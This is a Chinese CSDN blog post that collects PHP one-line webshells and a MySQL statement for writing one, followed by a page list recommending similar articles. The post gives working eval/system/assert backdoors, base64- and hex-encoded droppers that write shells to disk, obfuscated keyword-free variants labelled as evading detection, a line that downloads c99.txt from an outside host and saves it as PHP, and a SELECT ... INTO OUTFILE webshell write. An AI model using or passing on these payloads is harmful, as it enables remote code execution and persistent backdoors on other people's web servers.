mysql 一句话木马_PHP一句话木马小总结与SQL语句写一句话木马

最新推荐文章于 2023-01-07 15:28:56 发布
最新推荐文章于 2023-01-07 15:28:56 发布
阅读量326 收藏
点赞数
文章标签: mysql 一句话木马
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36260335/article/details/114771923
版权

一、基础类的一句话--功能仅限于验证漏洞了,实际中太容易被查出出来:

1 <?php @eval($_GET["code"])?>

2 <?php @system($_POST["cmd"])?>

相信一目了然可以看懂如何使用这类一句话。

二、编码的替换的类型:

d83941053242ecc07f948f67d7c084b5.gif

1 <?php @fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));?>

2 //会生成<?php @eval($_POST['lostwolf']);?>

3

4

5 //php在html内部的一种嵌入方式

6

7 <?php fputs (fopen(pack("H*","6c6f7374776f6c662e706870"),"w"),pack("H*","3c3f406576616c28245f504f53545b6c6f7374776f6c665d293f3e"))?>

8

9

10 <?php

11 session_start();

12 $_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);

13 $_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');?>

0f651066cffe78a1c31a05338083f8b9.gif

三、乱七八糟类型的:

1 <?php $_GET[a]($_GET[b]);?>

2 //?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};

3 <?php assert($_REQUEST["c"]);?> //菜刀连接 躲避检测 密码c

4 <?php substr(md5($_REQUEST['x']),28)=='acd0'&&eval($_REQUEST['c']);?>

5 //菜刀提交 http://192.168.1.5/x.php?x=lostwolf 脚本类型:php 密码为 c

四、下载类型的:

1 <?php echo copy("http://www.r57.me/c99.txt","lostwolf.php"); ?>

2

3 echo file_get_contents("..//cfg_database.php");?> //显示某文件

4

5 eval ( file_get_contents("远程shell")) ?> //运行远程shell

五、无关键函数类型:

0bd892c99290cecf54ae910d3557917c.gif

1 <?php

2 $_="";

3 $_[+""]='';

4 $_="$_"."";

5 $_=($_[+""]|" ").($_[+""]|"").($_[+""]^" ");

6 ?>

7 <?php ${'_'.$_}['_'](${'_'.$_}['__']);?>

8 http://site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass

9

10 $_="";$_[+""]='_';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>

8cb57581abb8c7e000679b2175e4ebc6.gif

六、补充知识点:

SQL写一句话(MySQL)

1 select "<?php @system($_POST["cmd"]);?>" into outfile "/home/webaccount/projectname/www/*.php"

2 #前面是一句话内容 后面是绝对路径www下的PHP文件,同理其他脚本也可以

sunny学姐
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MySQL导出一句话拿WebShell的方法
06-19
MySQL导出一句话拿WebShell的方法
mysqlphp木马_PHP一句话木马总结SQL语句一句话木马
weixin_35755823的博客
01-27 262
一、基础类的一句话--功能仅限于验证漏洞了,实际中太容易被查出出来:1 2 相信一目了然可以看懂如何使用这类一句话。二、编码的替换的类型:1 2 //会生成34 @fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));5 //ph...
php mysql 注入一句话木马_phpmyadmin一句话木马拿webshell思路(骇客协会)
weixin_35562134的博客
01-28 1250
先介绍MySQL导出一句话木马的语法(我个人比较喜欢说思路)Drop TABLE IF EXISTS temp; //如果存在temp就删掉Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段Insert INTO temp (cmd) VALUES(' php eval_r($_POST[cmd]);?>'); //把一句话木...
eval函数简介与PHP一句话木马剖析
热门推荐
对代码不满足,是任何真正有天才的程序员的根本特征。
01-29 2万+
eval函数简介与PHP一句话木马剖析    大家好我是Carol,我的QQ是:906871417 一:eval函数 二:eval函数的一般用法 三:eval函数的特殊用法 四:php一句话挂马的原理 五:禁用eval函数   一:eval函数 1.eval() 函数把字符串按照 PHP 代码来计算。 2.该
[12.27]Today of php Trojan analysis
Pz_mstr's Blog
12-27 155
Today Samples sample1 &lt;?php @assert("\$arr=\"".$_GET['cmd']."\";");?&gt; sample2 &lt;?php substr(md5($_REQUEST['x']),28)=='acd0'&amp;&amp;eval($_REQUEST['c']);?&gt; sample3 &lt;?php eval(gzunco
一句话木马<?php过滤
RAFANra的博客
04-26 2796
<?php过滤方法 打开题目显示flag在/var/www/html/flag.php 用图片合成一句话木马上传 上传成功之后点开发现我的<?php被过滤了 ![在这里插入图片 发现<?php被过滤。上百度去搜一下,发现大佬提出的建议使用: <scirpt language="pHp">@eval(['ios'])</script> 于是上传新马,成功挂马 得到flag ...
Mysql查询最近一条记录的sql语句(优化篇)
09-09
主要介绍了Mysql查询最近一条记录的sql语句,非常不错,具有一定的参考借鉴价值,需要的朋友参考下吧
mysql创建表的sql语句详细总结
12-14
mysql创建表的sql语句 mysql建表常用sql语句: 连接:mysql -h主机地址 -u用户名 -p用户密码 (注:u与root可以不用加空格,其它也一样) 断开:exit (回车) 创建授权:grant select on 数据库.* to 用户名@登录...
MySQL常用SQL语句总结包含复杂SQL查询
09-09
今天小编就为大家分享一篇关于MySQL常用SQL语句总结包含复杂SQL查询,小编觉得内容挺不错的,现在分享给大家,具有很好的参考价值,需要的朋友一起跟随小编来看看吧
phpmysql建立连接并执行SQL语句的代码
12-30
今天了一个小程序,很小很小,只不过是能够建立phpmysql的链接,并且实现简单的SQL语句。 新手初试,还请各路高手多多指导。 程序源代码如下: 复制代码 代码如下: <?php $conn = mysql_connect(“localhost...
网络安全概述
linux系统、网络编程和分布式计算
06-26 1302
一 网络安全概述: (一)网络上的威胁主要分为两大类(主动攻击和被动攻击): 1.主动攻击分为3类: *中断(interruption):攻击者有意中断他人在网络上的通信。 *篡改(modification):攻击者故意篡改网络上发送的报文。 *伪造(fabrication):攻击者伪造信息在网络上发送。 2.从类型分主动攻击分为: *更改报文流:包括对通过连接的PDU的真实
一句话木马及几种可绕过过滤格式
收集盒 Book box
04-12 3694
<br /><br />ASP一句话<br /> <br />1.<%eval request("YouPass")%><br /> <br />2. <%executerequest("YouPass")%><br /> <br />3. <%execute(request("YouPass"))%><br /> <br />免杀大部分网站的一句话<br /> <br />4.<% set ms = server.CreateObject("MSScriptControl.ScriptControl.1"
php mysql 注入一句话木马_PHPSQL语句一句话木马总结
weixin_30290673的博客
01-28 405
一、基础类的一句话--功能仅限于验证漏洞了,实际中非常容易被查出出来:二、编码的替换的类型://会生成@fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));//php在html内部的一种嵌入方式session_start();$...
一句话木马及免杀
Lum1n0us's Blog
08-12 1万+
这篇文章主要是总结一句话木马,并实现一句话木马的简单免杀,以及一个不死马的实现。 文章目录一句话木马及原理一句话木马简单免杀一、assert()二、字符串拼接三、函数四、request请求五、类六、base64加解密七、入木马不死马 一句话木马及原理 首先,来看最简单的一句话木马: <?php @eval($_POST['cmd']); ?> 前面的<?php ?>是php的文件格式,@是让程序在执行错误的情况下也不要报错,eval()函数是将括号里的内容都当作代码执行,$_PO
【python实现生成隐藏的一句话木马
qq_55213436的博客
07-28 1731
这个webshell的原理就是每一行最后都有空格与制表符。\t的数量代表着ascii码16进制的第一位,空格的数量代表着ascii码16进制的第二位。然后有个关键的15,其实代表了前15行的空白字符组成的是create_function,后面就可以一句话咯,例如@eval($_GET["pass"]);demo.php这样就可以生成一个让人摸不着头脑的php木马文件,内容和demo.php一模一样,但是利用webshellkiller工具、安全狗、D盾是无法识别出来的。...
python+php一句话木马的利用
CYLK1987310466的博客
07-29 1259
python知识点,php一句话木马
php 一句话木马 安全漏洞
fareast_mzh的博客
01-13 1197
* get.php <?php $_GET[a]($_GET[b]);?> ?a=assert&b=${} 参数b中的内容待定 创建文件code.txt fwrite(fopen("c.php", "w"), base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWyJjIl0pPz4=")) b.php <?php $...
mysql被木马入侵_另类网站入侵之一句话木马图片的妙用
weixin_42121412的博客
02-19 403
这篇文章有点标题党了,一句话木马大家都不陌生,我想很多菜菜都体验过他的强大之处吧。提起一句话我们不由得想起了laker大侠啊。可以说laker大侠的一句话木马真是为我们广大脚本入侵者带来不少的方便。今天我要讲述的这个入侵过程就和一句话木马密不可分,说到这大家应该都知道最终拿下这个站的的方法肯定是利用一句话了。不过这个站我还是费了好大周折才成功拿下一句话的。下面让我们一起回顾下整个过程吧。不会熟练使...
SQLess7一句话木马上传问题
weixin_46206086的博客
01-07 417
3.点击属性,找到这个mysql的data文件位置(因为我的数据都误放在了这个Mysql)5.关闭原来的Mysql服务,在PHPStudy中启动mysql服务并修改my.ini即可。2.输入win+R services.msc发现有一个Mysql在启动。4.将data文件拷贝到PHPStudy的data文件同目录替换。1.启动PHPStudy的mysql服务发现一直启动不了。在mysql数据库中用命令查找一下可修改文件的路径。发现要在网站根目录上上传木马才有效,于是找办法解决。
一个查询mysql表空间大小和调整mysql表空间大小的sql语句
最新发布
05-19
- 备份数据 if (mysql_query(&mysql, sql.c_str())) { cout 查询菜单失败: " << mysql_error(&mysql; - 删除表; - 重新创建表并导入数据; - 对表进行优化。 例如: ``` CREATE TABLE new) ; } else { result...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值